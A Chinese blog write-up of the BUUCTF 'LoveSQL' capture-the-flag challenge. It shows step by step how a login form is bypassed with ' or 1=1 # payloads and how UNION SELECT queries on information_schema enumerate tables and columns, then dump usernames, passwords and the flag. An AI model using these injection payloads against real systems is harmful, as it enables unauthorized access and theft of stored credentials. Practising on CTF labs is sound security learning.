buuctf_web_loveSQL

最新推荐文章于 2024-07-19 07:01:13 发布
最新推荐文章于 2024-07-19 07:01:13 发布
阅读量905 收藏 20
点赞数 23
文章标签: 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73118788/article/details/136377806
版权

题目:
在这里插入图片描述上面有行小红字,“用 sqlmap 是没有灵魂的”,呵呵。。嗯,确实
啥也憋说,先上万能钥匙:

a or 1=1 #
a’ or 1=1 #
a" or 1=1 #

尝试后的结果,可以发现该SQL验证是单引号,a' or 1=1 #注入过后结果:
在这里插入图片描述
这我猜是admin的密码(Hash)过后的。在这我要针对该题抛一个问题:
"用户名"和“密码”这俩个输入框,“用户名”我感觉不到什么用呐,只要用户名里面的input没有SQL语法,就…跟不存在一样(存疑)
下面我尝试了a';show databases;#;他给我报语法错误。
试完万能钥匙+想起来的一些经验,在看一下该表的列呗
payload:

1’ union select 1,2,3#

想像一下:
select admin,password from table where password=‘1’ union select 1,2,3 #’
结果:
在这里插入图片描述
如果是1’ union select 1,2,3,4#就会表明超过列了
在这里插入图片描述
学的少,下面就是复刻+学习大佬方法了

1’ union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1#

在这里插入图片描述

1.table_name: 这是要获取的列的名称,表示表的名称。
2.from information_schema.tables: 这部分指定了要查询的表,即信息架构中的表。
3.where table_schema=database(): 这部分是一个条件语句,用于筛选出当前数据库中的表。table_schema 表示数据库名称,而 database() 是一个 MySQL 函数,用于获取当前数据库的名称。
4.limit 0,1: 这是限制返回结果的数量,表示只返回第一行结果。
5.#: 这是一个 SQL 注释符号,用于注释掉后面的代码,避免影响查询的执行。

我试了,没limit 0,1这类的语句,他就只吐出该数据库第一行的表名
上图第二个payload同理,最后
在这里插入图片描述(我还有个问题,他咋知道Flag就在l0ve1ysq1表里?)
下面是对第三句payload的解释:

1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘l0ve1ysq1’ #

1.select 1,2,group_concat(column_name): 表示查询返回三列,前两列分别为数字1和2,第三列为通过 group_concat 函数连接所有列名的结果。
2.from information_schema.columns: 指定了要从信息架构的 columns 表中获取列的信息。
3.where table_name=‘l0ve1ysq1’: 这是一个筛选条件,用于限定查询的目标表名为 ‘l0ve1ysq1’。
4.#: 这是一个 SQL 注释符号,用于注释掉查询语句中后面的部分,以防止执行后续恶意代码。

结果:
在这里插入图片描述
从此我们可以看出,l0ve1ysq1表中有id username,password这三个列
payload:

1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#

union select 1,2,group_concat(id,username,password) from l0ve1ysq1: 这部分是一个 UNION 查询语句,将上面的字符串 ‘1’ 与来自表 ‘l0ve1ysq1’ 中的 id、username 和 password 字段值连接起来,然后将其作为一组新的查询结果。
在这里插入图片描述
Your password is ‘1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{9a840a89-5ed4-4346-820f-fdda9fcdf500}’
flag{9a840a89-5ed4-4346-820f-fdda9fcdf500}

新知识:
group_concat() 函数连接所有列名的结果
information_schema.tables: 这部分指定了信息架构中的表。(我一个大大的疑惑)

WLQH
关注
  • 23
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
buuctf_LoveSQL
qq_61968245的博客
12-22 2634
0x01 题目链接 BUUCTF在线评测BUUCTF 是一个 CTF 竞赛和训练平台,为各位 CTF 选手提供真实赛题在线复现等服务。https://buuoj.cn/challenges 0x02 题目
BUUCTF_web部分题解
热门推荐
ro4lsc的博客
04-14 1万+
[极客大挑战 2019]Havefun [CISCN2019 华北赛区 Day2 Web1]Hack World [极客大挑战 2019]Secret File [极客大挑战 2019]Knife [极客大挑战 2019]LoveSQL [极客大挑战 2019]Http [GXYCTF2019]Ping Ping Ping [极客大挑战 2019]BabySQL [极客大挑战 2019]BuyFlag [ZJCTF 2019]NiZhuanSiWei [ACTF2020 新生赛]Include
BUUCTFWebLoveSQL
qq_70434663的博客
03-06 693
我们要找的flag就在l0ve1ysq1表里面,为什么在第两张表里面,请张大你的眼睛看题目。发现爆出了字段id username password,我们的flag就在password里面。接下来就是爆出字段里面的内容,步骤同上述相同。在这里注意一下,在CTF中SQL注入漏洞flag通常会放在当前使用的数据库中,这里已经有了数据库所以可以直接爆出数据库的表。既然万能用户名行不通,那么我们就使用万能密码,用户名使用admin。既然爆出了表,接下来就是爆出表里面的字段了,同样的使用payload。
BUUCTF Web [极客大挑战 2024]LoveSQL_buuctf lovesql
06-24 918
进入题目连接是一个「登录」界面登录「成功」会显示当前用户的账号和密码登录「失败」则会则会提示错误的用户名和密码。
BUUCTF部分web题目
05-06
写题记录
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
【变量覆盖漏洞详解】 ...这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: ...攻击者可以通过操纵这些请求参数来覆盖预定义的变量,造成安全风险。... ...2. **extract()函数使用不当**: `extract()`函数会从数组中...
BUUCTFweb之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
MySQL(事务、索引)&&MyBatis
hycccccch的博客
07-19 458
事务指的是一组操作的集合,是一个不可分割的工作单位。事务会将所有的操作作为一个整体一起向系统提交或撤销操作请求,即这些操作要么同时成功,要么同时失败默认MySQL的事务是自动提交,即当执行一条DML语句时,MySQL会立即隐式的提交事务开启事务后运行事务不会对数据改变,commit后才会改变数据如果有命令发生错误,需要进行rollback进行回滚、
【星海随笔】vCenter Server 和主机管理。
weixin_41997073的博客
07-16 201
1.方法:删除页面信息,然后断连这个受管主机,断开受管主机的连接不会将其从 vCenter Server 中移除,而只是临时挂起 vCenter Server 执行的所有监控活动。2.方法:在分布式存储中找到该虚拟设备的存储盘,文件里找到相关的vmdk磁盘文件,点击注册虚拟机。当资料不匹配时候,可以删除展示页面,孤立的设备的 匹配位置的信息。断开后,然后重新连接,既可以重新识别受监管的主机。数据库在Vserver中展示的是一个数据库的资料,应该是client的资料。1.确定为资料不匹配导致的展示问题。
Spring框架之DI依赖注入
G81948577的博客
07-18 577
我们在下面构建spring的过程中体会依赖注入;从上面的图中我们知道,在ssm框架中服务层(server)无法直接操作数据库,持久层(dao)是直接操作数据库进行数据处理的,但是我们如果在服务层有一个持久层的对象,然后我们在服务层通过对象去调用持久层的方法就可以操作数据库了。@OverrideSystem.out.println("持久层,你好");UserServiceImpl类中的代码如下@Override。
深入 Dify 源码,洞察 Dify RAG 核心机制
易迟的专栏
07-17 1117
之前深入源码对 Dify 的完整流程进行了解读,基本上梳理了 Dify 的实现流程与主要组件。但是在实际部署之后,发现 Dify 现有的 RAG 检索效果没有那么理想。因此个人结合前端页面,配置信息与实现流程,深入查看了私有化部署的 Dify 的技术细节。将核心内容整理在这边,方便大家根据实际的业务场景调整 Dify 知识库的配置,或者根据需要进行二次开发调优。
day04:Redis和店铺营业状态设置
m0_69266818的博客
07-15 852
介绍了Redis命令和用java操作redis还有营业额状态接口的书写
怎样在 PostgreSQL 中实现数据的异地备份?
最新发布
技术笔记
07-19 858
总而言之,在 PostgreSQL 中实现数据的异地备份不是一件难事,但也需要我们认真对待,精心规划。选择合适的备份方法和异地存储方式,制定合理的备份策略,定期进行测试和恢复演练,才能确保我们的数据在任何情况下都能“安然无恙”。🎉相关推荐🍅关注博主🎗️带你畅游技术世界,不错过每一次成长机会!📚领书:PostgreSQL 入门到精通.pdf📙PostgreSQL 中文手册📘PostgreSQL 技术专栏🍅CSDN社区-墨松科技。
Apache AGE的WITH子句
oscube的博客
07-17 295
使用 WITH,您可以在将输出传递给以下查询部分之前对其进行操作。这些操作可以是结果集中条目的形状和/或数量。WITH 也可以像 RETURN 一样,使用别名对引入结果的表达式进行别名,使用别名作为绑定名称。WITH 还用于将图的读取与图的更新分开。查询的每个部分必须是只读的或只写的。从写入子句转到读取子句时,可以使用可选的 WITH 进行此操作。
linux系统 mysql-8.0.32安装
w20228396的博客
07-16 371
检查系统是否安装了mariadb数据库, mariadb数据库是mysql的分支,是免费开源的。初始化数据库,安装加密算法(初始化时候,密码将在log-error=/data/mysql-8.0.32/error.log中产生)若linux中安装了mariadb数据库,先卸载掉, mariadb数据库可能与安装mysql发生冲突。再去bin目录下,执行 mysqld_safe --skip-grant-tables &然后mysql -uroot -p登陆,直接回车,不需要密码可登陆进去。
redis基本类型和订阅
m0_62975692的博客
07-16 998
Redis支持发布订阅模式,可以将多个客户端连接到同一个频道,然后将消息发布到频道中,所有订阅该频道的客户端都能收到消息。其中,< host>是Redis服务器的主机名或IP地址,< port>是Redis服务器的端口号,< password>是Redis服务器的密码(如果有的话)。列表是一种有序的字符串集合,可以在列表的两端进行插入和删除操作。lrange # 获取列表指定范围的元素。lpush # 在列表左端插入元素 ,这里的。
buuctf web lovesql
03-16
buuctf web lovesql 是一个关于网络安全的比赛,主要涉及到 SQL 注入攻击技术。在比赛中,参赛者需要通过对网站的漏洞进行攻击,获取网站的敏感信息或者控制网站的权限。这个比赛对于提高网络安全意识和技术水平都有很大的帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值